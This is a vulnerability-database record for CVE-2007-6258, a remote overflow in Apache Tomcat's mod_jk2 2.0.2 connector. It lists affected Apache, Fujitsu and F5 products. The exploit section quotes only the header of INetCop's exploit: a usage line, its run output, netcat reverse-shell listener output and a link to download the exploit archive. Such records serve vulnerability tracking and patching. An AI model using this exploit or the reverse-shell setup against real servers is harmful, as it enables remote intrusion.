ID
VAR-E-200802-0592
CVE
cve_id: | CVE-2007-6258 | Trust: 1.3 |
EDB ID
5386
TITLE
Apache Tomcat Connector jk2-2.0.2 mod_jk2 - Remote Overflow - Linux remote Exploit
Trust: 0.6
DESCRIPTION
Apache Tomcat Connector jk2-2.0.2 mod_jk2 - Remote Overflow. CVE-2007-6258 . remote exploit for Linux platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | apache | model: | tomcat connector jk2-2.0.2 mod jk2 | scope: | - | version: | - | Trust: 1.0 |
vendor: | apache | model: | tomcat connector jk2-2.0.2 | scope: | - | version: | - | Trust: 0.6 |
vendor: | fujitsu | model: | interstage studio standard-j edition | scope: | eq | version: | 9.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage studio standard-j edition | scope: | eq | version: | 8.0.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage studio enterprise edition | scope: | eq | version: | 9.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage studio enterprise edition | scope: | eq | version: | 8.0.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage job workload server | scope: | eq | version: | 8.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage business application server enterprise edition | scope: | eq | version: | 8.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage apworks modelers-j edition | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage apworks modelers-j edition 6.0a | scope: | - | version: | - | Trust: 0.3 |
vendor: | fujitsu | model: | interstage apworks modelers-j edition | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard-j edition a | scope: | eq | version: | 9.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard-j edition | scope: | eq | version: | 9.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard-j edition | scope: | eq | version: | 8.0.2 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard-j edition | scope: | eq | version: | 8.0.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server standard-j edition | scope: | eq | version: | 8.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus developer | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus developer | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus | scope: | eq | version: | 7.0.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server plus | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition a | scope: | eq | version: | 9.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 9.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 8.0.2 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 8.0.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 8.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 7.0.1 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 7.0 | Trust: 0.3 |
vendor: | fujitsu | model: | interstage application server enterprise edition | scope: | eq | version: | 6.0 | Trust: 0.3 |
vendor: | f5 | model: | bigip | scope: | eq | version: | 9.2.3.30 | Trust: 0.3 |
vendor: | apache | model: | software foundation mod jk2 | scope: | eq | version: | 2.0.2 | Trust: 0.3 |
vendor: | apache | model: | software foundation mod jk2 | scope: | eq | version: | 2.0.1 | Trust: 0.3 |
vendor: | apache | model: | software foundation mod jk2 | scope: | eq | version: | 2.0 | Trust: 0.3 |
vendor: | apache | model: | software foundation mod jk2 2.0.3-dev | scope: | - | version: | - | Trust: 0.3 |
vendor: | apache | model: | software foundation mod jk2 | scope: | ne | version: | 2.0.4 | Trust: 0.3 |
EXPLOIT
/*
**
** Fedora Core 6,7,8 (exec-shield) based
** Apache Tomcat Connector jk2-2.0.2(mod_jk2) remote overflow exploit
** by INetCop Security
**
** Advanced exploitation in exec-shield (Fedora Core case study)
** URL: http://www.milw0rm.com/papers/151
**
** IOActive Security Advisory:
** http://www.securityfocus.com/archive/1/487983
**
** Heretic2(heretic2x@gmail.com)'s exploit (Win32):
** http://www.milw0rm.com/exploits/5330
**
** --
** exploit by INetCop Security.
*/
/*
** --
** $ ./0x82-apache-mod_jk2 61.xx.xx.20 80 61.xx.xx.30
**
** Fedora Core release 6 (exec-shield) based
** Apache Tomcat Connector (mod_jk2) remote overflow exploit
** Target Version: Apache/2.0.53 (Unix) mod_jk2/2.0.2
** by INetCop Security
**
** + make socket
** + make exploit payload
** + try connected 61.42.25.22:80
** + exploit send!
** * attacker host, check it up, now! :-D
**
** $
** --
**
** attacker's server port 56789: --
** $ nc -l -p 56789 -vv
** listening on [any] 56789 ...
** 61.xx.xx.20: inverse host lookup failed: Unknown host
** connect to [61.xx.xx.30] from (UNKNOWN) [61.xx.xx.20] 47576
** id
** --
**
** attacker's server port 5678: --
** $ nc -l -p 5678 -vv
** listening on [any] 5678 ...
** 61.xx.xx.20: inverse host lookup failed: Unknown host
** connect to [61.xx.xx.30] from (UNKNOWN) [61.xx.xx.20] 52452
** uid=99(nobody) gid=4294967295 groups=4294967295 context=root:system_r:unconfined_t:s0-s0:c0.c1023
** --
**
*/
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5386.tar.gz (2008-x2_fc6f7f8.tar.gz)
# milw0rm.com [2008-04-06]
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Remote Overflow
Trust: 1.0
CREDITS
INetCop Security
Trust: 0.6
EXTERNAL IDS
db: | EXPLOIT-DB | id: | 5386 | Trust: 1.6 |
db: | NVD | id: | CVE-2007-6258 | Trust: 1.3 |
db: | EDBNET | id: | 29686 | Trust: 0.6 |
db: | BID | id: | 27752 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2007-6258 | Trust: 1.0 |
url: | https://www.exploit-db.com/exploits/5386/ | Trust: 0.6 |
url: | http://tomcat.apache.org/download-connectors.cgi | Trust: 0.3 |
url: | http://www.fujitsu.com/global/support/software/security/products-f/interstage-201004e.html | Trust: 0.3 |
SOURCES
db: | BID | id: | 27752 |
db: | EXPLOIT-DB | id: | 5386 |
db: | EDBNET | id: | 29686 |
LAST UPDATE DATE
2022-07-27T09:17:06.057000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 27752 | date: | 2010-10-27T11:38:00 |
SOURCES RELEASE DATE
db: | BID | id: | 27752 | date: | 2008-02-12T00:00:00 |
db: | EXPLOIT-DB | id: | 5386 | date: | 2008-04-06T00:00:00 |
db: | EDBNET | id: | 29686 | date: | 2008-04-06T00:00:00 |